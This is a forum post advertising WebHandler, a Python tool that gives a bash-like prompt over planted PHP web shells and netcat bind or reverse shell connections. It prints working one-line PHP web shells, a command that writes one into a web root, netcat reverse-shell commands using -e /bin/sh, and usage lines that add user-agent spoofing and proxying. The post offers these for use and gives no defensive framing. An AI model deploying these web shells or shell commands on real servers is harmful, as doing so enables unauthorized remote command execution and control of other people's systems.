Jump to content
Fi8sVrs

WebHandler

Recommended Posts

  • Active Members

webhandler.jpg

Info

WebHandler tries to simulate a 'Linux bash prompt' to handle and process:

- PHP program execution functions _(e.g. `system`, `passthru`, `exec`, etc)_
- Bind shell connections _(e.g. `nc <ip> <port>`)_
- Reserve shell connections _(e.g. `nc -lvvp 1234`)_

Another feature is to spoof the "User-Agent" field in the HTTP header. (--random-angent).

It also supports HTTP proxies (--proxy http://<ip>:<port>)

WebHandler works for POST and GET requests:

<?php system($_GET['cmd']); ?>
<?php passthru($_REQUEST['cmd']); ?>
<?php echo exec($_POST['cmd']); ?>

WebHandler is a replacement for netcat connections.

A example bind connection (e.g. nc -lvvp 1234 -e /bin/sh)

Normally the user would do:

netcat -l -p 1234
nc -lvvp 1234

A example reverse connection (e.g. nc 127.0.0.1 4321 -e /bin/sh)

Normally the user would do:

netcat -l -p 4321
nc -lvvp 4321

Usage

--Example file:

echo '<?php system($_GET['cmd']); ?>' > /var/www/shell.php

--url is a required argument when sending either GET or POST requests (e.g. a bind 'web based PHP' connection):

python webhandler.py --url http://www.mywebsite.com/shell.php?cmd=
python webhandler.py --url http://www.mywebsite.com/shell.php --method POST --parameter cmd
python webhandler.py -u http://www.mywebsite.com/shell.php?cmd= --random-agent --turbo
python webhandler.py -u http://www.mywebsite.com/shell.php?cmd= --proxy http://127.0.0.1:8080

--listen is a required argument when working waiting connection (e.g. a reverse 'raw' connection):

python webhandler.py --listen 1234

Dependencies

If your Python's version < 2.7.x, then argparse is required To install it run:

sudo (apt-get|yum) install python-setuptools && sudo easy_install argparse

OR

sudo pip --install argparse.

readline is optional. This module it used to provide elaborate line editing and history features

git is optional. This allows for the project to be kept up-to-date

Links

Wiki

Known Bugs

Download

Source

Edited by Fi8sVrs
  • Upvote 1
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...